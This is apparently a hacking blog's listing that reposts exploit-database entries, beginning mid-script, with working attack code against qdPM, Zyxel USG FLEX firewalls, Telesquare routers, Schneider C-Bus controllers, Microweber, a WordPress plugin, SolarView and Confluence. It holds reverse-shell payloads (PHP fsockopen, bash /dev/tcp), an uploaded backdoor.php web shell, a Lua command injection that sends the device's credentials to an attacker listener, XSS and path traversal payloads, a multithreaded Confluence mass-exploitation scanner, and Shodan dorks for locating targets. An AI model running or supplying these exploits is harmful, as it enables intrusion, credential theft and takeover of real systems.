'$sock=fsockopen(\"{lhost_ip}\",{lhost_port});exec(\"/bin/bash <&3 >&3 2>&3\");'" payload = generate_payload(command) print(f"[+] Upload exploit") result = req.post(url=upload_url, headers=payload_header, data=payload, proxies= {"http": "http://127.0.0.1:8080"}) set_exploit_file_name(result.content.decode('ascii')) def set_exploit_file_name(data): global exploit_file_name file_regex = r"[a-zA-Z0-9]{4,5}.php" exploit_file_name = re.search(file_regex, data).group(0) def call_malicious_php(file_name): global header complete_url = f"{url}/data/i/{file_name}" print('[*] Calling reverse shell') result = req.get(url=complete_url) def check_reverse_shell(): yes = {'yes', 'y', 'ye', ''} no = {'no', 'n'} choice = input("Have you got an active netcat listener (y/Y or n/N): ") if choice in yes: return True elif choice in no: print(f"[!] Please open netcat listener with \"nc -lnvp {lhost_port}\"") return False def main(): enabled_listener = check_reverse_shell() if enabled_listener: login(username, password) send_payload() call_malicious_php(exploit_file_name) if __name__ == "__main__": main()
  18. HireHackking

    qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) (v2)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) # Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net # Date: 2021-08-03 # Original Exploit Author: Rishal Dwivedi (Loginsoft) # Original ExploitDB ID: 47954 (https://www.exploit-db.com/exploits/47954) # Exploit Author: Leon Trappett (thepcn3rd) # Vendor Homepage: http://qdpm.net/ # Software Link: http://qdpm.net/download-qdpm-free-project-management # Version: <=1.9.1 # Tested on: Ubuntu Server 20.04 (Python 3.9.2) # CVE : CVE-2020-7246 # Exploit written in Python 3.9.2 # Tested Environment - Ubuntu Server 20.04 LTS # Path Traversal + Remote Code Execution # Exploit modification: RedHatAugust #!/usr/bin/python3 import sys import requests from lxml import html from argparse import ArgumentParser session_requests = requests.session() def multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, uservar): request_1 = { 'sf_method': (None, 'put'), 'users[id]': (None, userid[-1]), 'users[photo_preview]': (None, uservar), 'users[_csrf_token]': (None, csrftoken_[-1]), 'users[name]': (None, username[-1]), 'users[new_password]': (None, ''), 'users[email]': (None, EMAIL), 'extra_fields[9]': (None, ''), 'users[remove_photo]': (None, '1'), } return request_1 def req(userid, username, csrftoken_, EMAIL, HOSTNAME): request_1 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '.htaccess') new = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_1) request_2 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '../.htaccess') new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_2) request_3 = { 'sf_method': (None, 'put'), 'users[id]': (None, userid[-1]), 'users[photo_preview]': (None, ''), 'users[_csrf_token]': (None, csrftoken_[-1]), 'users[name]': (None, username[-1]), 'users[new_password]': (None, ''), 'users[email]': (None, EMAIL), 'extra_fields[9]': (None, ''), 'users[photo]': ('backdoor.php', '<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>', 'application/octet-stream'), } upload_req = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_3) def main(HOSTNAME, EMAIL, PASSWORD): url = HOSTNAME + '/index.php/login' result = session_requests.get(url) #print(result.text) login_tree = html.fromstring(result.text) authenticity_token = list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value")))[0] payload = {'login[email]': EMAIL, 'login[password]': PASSWORD, 'login[_csrf_token]': authenticity_token} result = session_requests.post(HOSTNAME + '/index.php/login', data=payload, headers=dict(referer=HOSTNAME + '/index.php/login')) # The designated admin account does not have a myAccount page account_page = session_requests.get(HOSTNAME + 'index.php/myAccount') account_tree = html.fromstring(account_page.content) userid = account_tree.xpath("//input[@name='users[id]']/@value") username = account_tree.xpath("//input[@name='users[name]']/@value") csrftoken_ = account_tree.xpath("//input[@name='users[_csrf_token]']/@value") req(userid, username, csrftoken_, EMAIL, HOSTNAME) get_file = session_requests.get(HOSTNAME + 'index.php/myAccount') final_tree = html.fromstring(get_file.content) backdoor = requests.get(HOSTNAME + "uploads/users/") count = 0 dateStamp = "1970-01-01 00:00" backdoorFile = "" for line in backdoor.text.split("\n"): count = count + 1 if "backdoor.php" in str(line): try: start = "\"right\"" end = " </td" line = str(line) dateStampNew = line[line.index(start)+8:line.index(end)] if (dateStampNew > dateStamp): dateStamp = dateStampNew print("The DateStamp is " + dateStamp) backdoorFile = line[line.index("href")+6:line.index("php")+3] except: print("Exception occurred") continue #print(backdoor) print('Backdoor uploaded at - > ' + HOSTNAME + 'uploads/users/' + backdoorFile + '?cmd=whoami') if __name__ == '__main__': print("You are not able to use the designated admin account because they do not have a myAccount page.\n") parser = ArgumentParser(description='qdmp - Path traversal + RCE Exploit') parser.add_argument('-url', '--host', dest='hostname', help='Project URL') parser.add_argument('-u', '--email', dest='email', help='User email (Any privilege account)') parser.add_argument('-p', '--password', dest='password', help='User password') args = parser.parse_args() # Added detection if the arguments are passed and populated, if not display the arguments if (len(sys.argv) > 1 and isinstance(args.hostname, str) and isinstance(args.email, str) and isinstance(args.password, str)): main(args.hostname, args.email, args.password) else: parser.print_help()
  19. HireHackking

    Zyxel USG FLEX 5.21 - OS Command Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection # Shodan Dork: title:"USG FLEX 100" title:"USG FLEX 100W" title:"USG FLEX 200" title:"USG FLEX 500" title:"USG FLEX 700" title:"USG20-VPN" title:"USG20W-VPN" title:"ATP 100" title:"ATP 200" title:"ATP 500" title:"ATP 700" title:"ATP 800" # Date: May 18th 2022 # Exploit Author: Valentin Lobstein # Vendor Homepage: https://www.zyxel.com # Version: ZLD5.00 thru ZLD5.21 # Tested on: Linux # CVE: CVE-2022-30525 from requests.packages.urllib3.exceptions import InsecureRequestWarning import sys import json import base64 import requests import argparse parser = argparse.ArgumentParser( prog="CVE-2022-30525.py", description="Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444", ) parser.add_argument("-u", dest="url", help="Specify target URL") parser.add_argument("-r", dest="host", help="Specify Remote host") parser.add_argument("-p", dest="port", help="Specify Remote port") args = parser.parse_args() banner = ( "ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7" "LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg" "ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg" "LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8" "ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg" "KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n" "ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp" "biA6KSApCg==" ) def main(): print("\n" + base64.b64decode(banner).decode("utf-8")) if None in vars(args).values(): print(f"[!] Please enter all parameters !") parser.print_help() sys.exit() if "http" not in args.url: args.url = "https://" + args.url args.url += "/ztp/cgi-bin/handler" exploit(args.url, args.host, args.port) def exploit(url, host, port): headers = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0", "Content-Type": "application/json", } data = { "command": "setWanPortSt", "proto": "dhcp", "port": "4", "vlan_tagged": "1", "vlanid": "5", "mtu": f'; bash -c "exec bash -i &>/dev/tcp/{host}/{port}<&1;";', "data": "hi", } requests.packages.urllib3.disable_warnings(InsecureRequestWarning) print(f"\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}") try: response = requests.post( url=url, headers=headers, data=json.dumps(data), verify=False, timeout=5 ) except (KeyboardInterrupt, requests.exceptions.Timeout): print("[!] Bye Bye hekcer !") sys.exit(1) finally: try: print("[!] Can't exploit the target ! Code :", response.status_code) except: print("[!] Enjoy your shell !!!") if __name__ == "__main__": main()
  20. HireHackking

    Telesquare SDT-CW3B1 1.1.0 - OS Command Injection

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/python3 # Exploit Title: Telesquare SDT-CW3B1 1.1.0 - OS Command Injection # Date: 24th May 2022 # Exploit Author: Bryan Leong <NobodyAtall> # Vendor Homepage: http://telesquare.co.kr/ # CVE : CVE-2021-46422 # Authentication Required: No import requests import argparse import sys from xml.etree import ElementTree def sysArgument(): ap = argparse.ArgumentParser() ap.add_argument("--host", required=True, help="target hostname/IP") args = vars(ap.parse_args()) return args['host'] def checkHost(host): url = "http://" + host print("[*] Checking host is it alive?") try: rsl = requests.get(url) print("[*] The host is alive.") except requests.exceptions.Timeout as err: raise SystemExit(err) def exploit(host): url = "http://" + host + "/cgi-bin/admin.cgi?Command=sysCommand&Cmd=" #checking does the CGI exists? rsl = requests.get(url) if(rsl.status_code == 200): print("[*] CGI script exist!") print("[*] Injecting some shell command.") #1st test injecting id command cmd = "id" try: rsl = requests.get(url + cmd, stream=True) xmlparser = ElementTree.iterparse(rsl.raw) cmdRet = [] for event, elem in xmlparser: if(elem.tag == 'CmdResult'): cmdRet.append(elem.text) except: print("[!] No XML returned from CGI script. Possible not vulnerable to the exploit") sys.exit(0) if(len(cmdRet) != 0): print("[*] There's response from the CGI script!") print('[*] System ID: ' + cmdRet[0].strip()) print("[*] Spawning shell. type .exit to exit the shell", end="\n\n") #start shell iteration while(True): cmdInput = input("[SDT-CW3B1 Shell]# ") if(cmdInput == ".exit"): print("[*] Exiting shell.") sys.exit(0) rsl = requests.get(url + cmdInput, stream=True) xmlparser = ElementTree.iterparse(rsl.raw) for event, elem in xmlparser: if(elem.tag == 'CmdResult'): print(elem.text.strip()) print('\n') else: print("[!] Something doesn't looks right. Please check the request packet using burpsuite/wireshark/etc.") sys.exit(0) else: print("[!] CGI script not found.") print(rsl.status_code) sys.exit(0) def main(): host = sysArgument() checkHost(host) exploit(host) if __name__ == "__main__": main()
  21. HireHackking

    Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 - Remote Code Execution (RCE) # Exploit Author: LiquidWorm #!/usr/bin/env python3 # -*- coding: utf-8 -*- # # # Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 Remote Root Exploit # # # Vendor: Schneider Electric SE # Product web page: https://www.se.com | https://www.clipsal.com # Product details: # - https://www.clipsal.com/Trade/Products/ProductDetail?catno=5500SHAC # - https://www.se.com/ww/en/product/5500AC2/application-controller-spacelogic-cbus-rs232-485-ethernet-din-mount-24v-dc/ # Affected version: CLIPSAL 5500SHAC (i.MX28) # CLIPSAL 5500NAC (i.MX28) # SW: 1.10.0, 1.6.0 # HW: 1.0 # Potentially vulnerable (alternative products/same codebase?): 5500NAC2 and 5500AC2 # SpaceLogic C-Bus # # Summary: The C-Bus Network Automation Controller (5500NAC) and the Wiser # for C-Bus Automation Controller (5500SHAC)) is an advanced controller from # Schneider Electric. It is specifically designed to unite the C-Bus home # automation solution with common household communication protocols, from # lighting and climate control, to security, entertainment and energy metering. # The Wiser for C-Bus Automation Controller manages and controls C-Bus systems # for residential homes or zones within a building and integrates functions # such as heating/cooling, energy/load monitoring and remote control for C-Bus # and Modbus. # # Desc: The automation controller suffers from an authenticated arbitrary # command execution vulnerability. An attacker can abuse the Start-up (init) # script editor and exploit the 'script' POST parameter to insert malicious # Lua script code and execute commands with root privileges that will grant # full control of the device. # # ------------------------------------------------------------------------------ # $ ./c-bus.py http://192.168.0.10 "cat /etc/config/httpd;id" 192.168.0.37 8888 # ---------------------------------------------------------------------- # Starting Z-Bus 2.5.1 ( https://zeroscience.mk ) at 15.03.2022 11:26:38 # [*] Starting exfiltration handler on port 8888 # [*] Writing Lua initscript... done. # [*] Running os.execute()... done. # [*] Got request from 192.168.0.10:33522 # [*] Printing target's request: # # b"GET / HTTP/1.1\r\nHost: 192.168.0.37:8888\r\nUser-Agent: \nconfig user # 'admin'\n\toption password 'admin123'\n\nconfig user 'remote'\n\toption # password 'remote'\n\nuid=0(root) gid=0(root) groups=0(root)\r\nConnection: # close\r\n\r\n" # # [*] Cleaning up... done. # # $ # ------------------------------------------------------------------------------ # # Tested on: CPU model: ARM926EJ-S rev 5 (v5l) # GNU/Linux 4.4.115 (armv5tejl) # LuaJIT 2.0.5 # FlashSYS v2 # nginx # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # Macedonian Information Security Research and Development Laboratory # Zero Science Lab - https://www.zeroscience.mk - @zeroscience # # # Advisory ID: ZSL-2022-5707 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5707.php # # # 12.03.2022 # import threading#! import datetime##! import requests##! import socket####! import time######! import sys#######! import re########! from requests.auth import HTTPBasicAuth from time import sleep as spikaj class Wiser: def __init__(self): self.headers = None self.uri = '/scada-main/scripting/' self.savs = self.uri + 'save' self.runs = self.uri + 'run' self.start = datetime.datetime.now() self.start = self.start.strftime('%d.%m.%Y %H:%M:%S') self.creds = HTTPBasicAuth('admin', 'admin123') def memo(self): if len(sys.argv) != 5: self.use() else: self.target = sys.argv[1] self.execmd = sys.argv[2] self.localh = sys.argv[3] self.localp = int(sys.argv[4]) if not 'http' in self.target: self.target = 'http://{}'.format(self.target) def exfil(self): print('[*] Starting exfiltration handler on port {}'.format(self.localp)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('0.0.0.0', self.localp)) while True: try: s.settimeout(9) s.listen(1) conn, addr = s.accept() print('[*] Got request from {}:{}'.format(addr[0], addr[1])) data = conn.recv(2003) print('[*] Printing target\'s request:') print('\n%s' %data) except socket.timeout as p: print('[!] Something\'s not right. Check your port mappings!') break s.close() self.clean() def mtask(self): konac = threading.Thread(name='thricer.exe', target=self.exfil) konac.start() self.byts() def byts(self): self.headers = { 'Referer':self.target+'/scada-main/main/editor?id=initscript', 'Sec-Ch-Ua':'"(Not(A:Brand";v="8", "Chromium";v="98"', 'Cookie':'x-logout=0; x-auth=; x-login=1; pin=', 'Content-Type':'text/plain;charset=UTF-8', 'User-Agent':'SweetHomeAlabama/2003.59', 'X-Requested-With':'XMLHttpRequest', 'Accept-Language':'en-US,en;q=0.9', 'Accept-Encoding':'gzip, deflate', 'Sec-Ch-Ua-Platform':'"Windows"', 'Sec-Fetch-Site':'same-origin', 'Connection':'keep-alive', 'Sec-Fetch-Dest':'empty', 'Sec-Ch-Ua-Mobile':'?0', 'Sec-Fetch-Mode':'cors', 'Origin':self.target, 'Accept':'*/*', 'sec-gpc':'1' } self.loada = '\x64\x61\x74\x61\x3D\x7B' # data={ self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x34\x22\x3A\x22\x22\x2C' # "ext-comp-1004":"", self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x35\x22\x3A\x22\x22\x2C' # "ext-comp-1005":"", self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x36\x22\x3A\x22\x22\x2C' # "ext-comp-1006":"", self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x37\x22\x3A\x22\x22\x2C' # "ext-comp-1007":"", self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x38\x22\x3A\x22\x22\x2C' # "ext-comp-1008":"", self.loada += '\x22\x73\x63\x61\x64\x61\x2D\x68\x65\x6C\x70\x2D\x73\x65\x61\x72\x63\x68\x22\x3A\x22\x22\x2C' # "scada-help-search":"", self.loada += '\x22\x69\x64\x22\x3A\x22\x69\x6E\x69\x74\x73\x63\x72\x69\x70\x74\x22\x2C' # "id":"initscript", self.loada += '\x22\x73\x63\x72\x69\x70\x74\x22\x3A\x6E\x75\x6C\x6C\x2C' # "script":null, self.loada += '\x22\x73\x63\x72\x69\x70\x74\x6F\x6E\x6C\x79\x22\x3A\x22\x74\x72\x75\x65\x22\x7D' # "scriptonly":"true"} self.loada += '\x26\x73\x63\x72\x69\x70\x74\x3D\x6F\x73\x2E\x65\x78\x65\x63\x75\x74\x65' # &script=os.execute self.loada += '\x28\x27\x77\x67\x65\x74\x20\x2D\x55\x20\x22\x60' # ('wget -U "` self.loada += self.execmd # [command input] self.loada += '\x60\x22\x20' # `". self.loada += self.localh+':'+str(self.localp) # [listener input] self.loada += '\x27\x29' # ') self.loadb = '\x64\x61\x74\x61\x3D\x7B' # data={ self.loadb += '\x22\x69\x64\x22\x3A\x22\x69\x6E\x69\x74\x73\x63\x72\x69\x70\x74\x22\x7D' # "id":"initscript"} print('[*] Writing Lua initscript... ', end='') sys.stdout.flush() spikaj(0.7) htreq = requests.post(self.target+self.savs, data=self.loada, headers=self.headers, auth=self.creds) if not 'success' in htreq.text: print('didn\'t work!') exit(17) else: print('done.') print('[*] Running os.execute()... ', end='') sys.stdout.flush() spikaj(0.7) htreq = requests.post(self.target+self.runs, data=self.loadb, headers=self.headers, auth=self.creds) if not 'success' in htreq.text: print('didn\'t work!') exit(19) else: print('done.') def splash(self): Baah_loon = ''' ###### ########## ###### _\_ ##===----[.].] #( , _\\ # )\__| \ / `-._``-' >@ | | | | | Schneider Electric C-Bus SmartHome Automation Controller | Root Remote Code Execution Proof of Concept | ZSL-2022-5707 | | | ''' print(Baah_loon) def use(self): self.splash() print('Usage: ./c-bus.py [target] [cmd] [lhost] [lport]') exit(0) def clean(self): print('\n[*] Cleaning up... ', end='') sys.stdout.flush() spikaj(0.7) self.headers = {'X-Requested-With':'XMLHttpRequest'} self.blank = '\x64\x61\x74\x61\x3D\x25\x37\x42\x25\x32\x32' self.blank += '\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30' self.blank += '\x30\x34\x25\x32\x32\x25\x33\x41\x25\x32\x32' self.blank += '\x25\x32\x32\x25\x32\x43\x25\x32\x32\x65\x78' self.dlank = '\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x35' self.dlank += '\x25\x32\x32\x25\x33\x41\x25\x32\x32\x25\x32' self.dlank += '\x32\x25\x32\x43\x25\x32\x32\x65\x78\x74\x2D' self.dlank += '\x63\x6F\x6D\x70\x2D\x31\x30\x30\x36\x25\x32' self.clank = '\x32\x25\x33\x41\x25\x32\x32\x25\x32\x32\x25' self.clank += '\x32\x43\x25\x32\x32\x65\x78\x74\x2D\x63\x6F' self.clank += '\x6D\x70\x2D\x31\x30\x30\x37\x25\x32\x32\x25' self.clank += '\x33\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43' self.slank = '\x25\x32\x32\x65\x78\x74\x2D\x63\x6F\x6D\x70' self.slank += '\x2D\x31\x30\x30\x38\x25\x32\x32\x25\x33\x41' self.slank += '\x25\x32\x32\x25\x32\x32\x25\x32\x43\x25\x32' self.slank += '\x32\x73\x63\x61\x64\x61\x2D\x68\x65\x6C\x70' self.glank = '\x2D\x73\x65\x61\x72\x63\x68\x25\x32\x32\x25' self.glank += '\x33\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43' self.glank += '\x25\x32\x32\x69\x64\x25\x32\x32\x25\x33\x41' self.glank += '\x25\x32\x32\x69\x6E\x69\x74\x73\x63\x72\x69' self.hlank = '\x70\x74\x25\x32\x32\x25\x32\x43\x25\x32\x32' self.hlank += '\x73\x63\x72\x69\x70\x74\x25\x32\x32\x25\x33' self.hlank += '\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43\x25' self.hlank += '\x32\x32\x73\x63\x72\x69\x70\x74\x6F\x6E\x6C' self.flank = '\x79\x25\x32\x32\x25\x33\x41\x25\x32\x32\x74' self.flank += '\x72\x75\x65\x25\x32\x32\x25\x37\x44'#######' self.clear = f'{self.blank}{self.dlank}{self.clank}{self.slank}{self.glank}{self.hlank}{self.flank}' htreq = requests.post(self.target+self.savs, data=self.clear, headers=self.headers, auth=self.creds) if not 'success' in htreq.text: print('didn\'t work!') exit(18) else: print('done.') exit(-1) def main(self): print('-'*70) print('Starting Z-Bus 2.5.1 ( https://zeroscience.mk ) at', self.start) self.memo(), self.mtask() if __name__ == '__main__': Wiser().main()
  22. HireHackking

    Microweber CMS 1.2.15 - Account Takeover

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Microweber CMS 1.2.15 - Account Takeover # Date: 2022-05-09 # Exploit Author: Manojkumar J # Vendor Homepage: https://github.com/microweber/microweber # Software Link: https://github.com/microweber/microweber/releases/tag/v1.2.15 # Version: <=1.2.15 # Tested on: Windows10 # CVE : CVE-2022-1631 # Description: Microweber Drag and Drop Website Builder E-commerce CMS v1.2.15 Oauth Misconfiguration Leads To Account Takeover. # Steps to exploit: 1. Create an account with the victim's email address. Register endpoint: https://target-website.com/register# 2. When the victim tries to login with default Oauth providers like Google, Github, Microsoft, Twitter, Linkedin, Telegram or Facebook etc(auth login) with that same e-mail id that we created account before, via this way we can take over the victim's account with the recently created login credentials.
  23. HireHackking

    WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS) # Date: 2022-06-05 # Exploit Author: Sanjay Singh # Vendor Homepage: https://motopress.com/ # Software Link: https://downloads.wordpress.org/plugin/motopress-hotel-booking-lite.4.2.4.zip # Version: 4.2.4 # Tested on: Windows/XAMPP ########################################################################### PoC: 1. http://localhost/wp-admin/edit.php?post_type=mphb_room_type 2. Click on "Add Accommodation Type". 3. Add title payload= "><script>alert("XSS")</script> 4. Excerpt input payload "><script>alert("XSS")</script> 5. Click publish. 6. Visit http://localhost/accommodations/ 7. XSS payload execute.
  24. HireHackking

    SolarView Compact 6.00 - Directory Traversal

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SolarView Compact 6.00 - Directory Traversal # Date: 2022-05-15 # Exploit Author: Ahmed Alroky # Author Company : Aiactive # Author linkedin profile : https://www.linkedin.com/in/ahmedalroky/ # Version: ver.6.00 # Vendor home page : https://www.contec.com/ # Authentication Required: No # CVE : CVE-2022-29298 # Tested on: Windows # Exploit: http://IP_ADDRESS/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg
  25. HireHackking

    Confluence Data Center 7.18.0 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Confluence Data Center 7.18.0 - Remote Code Execution (RCE) # Google Dork: N/A # Date: 06/006/2022 # Exploit Author: h3v0x # Vendor Homepage: https://www.atlassian.com/ # Software Link: https://www.atlassian.com/software/confluence/download-archives # Version: All < 7.4.17 versions before 7.18.1 # Tested on: - # CVE : CVE-2022-26134 # https://github.com/h3v0x/CVE-2022-26134 #!/usr/bin/python3 import sys import requests import optparse import multiprocessing from requests.packages import urllib3 from requests.exceptions import MissingSchema, InvalidURL urllib3.disable_warnings() requestEngine = multiprocessing.Manager() session = requests.Session() global paramResults paramResults = requestEngine.list() globals().update(locals()) def spiderXpl(url): globals().update(locals()) if not url.startswith('http'): url='http://'+url headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "Connection": "close", "Accept-Encoding": "gzip, deflate"} try: response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False) if(response.status_code == 302): print('Found: '+url+' // '+ response.headers['X-Cmd-Response']) inputBuffer = str(response.headers['X-Cmd-Response']) paramResults.append('Vulnerable application found:'+url+'\n''Command result:'+inputBuffer+'\n') else: pass except requests.exceptions.ConnectionError: print('[x] Failed to Connect: '+url) pass except multiprocessing.log_to_stderr: pass except KeyboardInterrupt: print('[!] Stoping exploit...') exit(0) except (MissingSchema, InvalidURL): pass def banner(): print('[-] CVE-2022-26134') print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \n') def main(): banner() globals().update(locals()) sys.setrecursionlimit(100000) if not optionsOpt.filehosts: url = optionsOpt.url spiderXpl(url) else: f = open(optionsOpt.filehosts) urls = map(str.strip, f.readlines()) multiReq = multiprocessing.Pool(optionsOpt.threads_set) try: multiReq.map(spiderXpl, urls) multiReq.close() multiReq.join() except UnboundLocalError: pass except KeyboardInterrupt: exit(0) if optionsOpt.output: print("\n[!] Saving the output result in: %s" % optionsOpt.output) with open(optionsOpt.output, "w") as f: for result in paramResults: f.write("%s\n" % result) f.close() if __name__ == "__main__": parser = optparse.OptionParser() parser.add_option('-u', '--url', action="store", dest="url", help='Base target uri (ex. http://target-uri/)') parser.add_option('-f', '--file', dest="filehosts", help='example.txt') parser.add_option('-t', '--threads', dest="threads_set", type=int,default=10) parser.add_option('-m', '--maxtimeout', dest="timeout", type=int,default=8) parser.add_option('-o', '--output', dest="output", type=str, default='exploit_result.txt') parser.add_option('-c', '--cmd', dest="command", type=str, default='id') optionsOpt, args = parser.parse_args() main()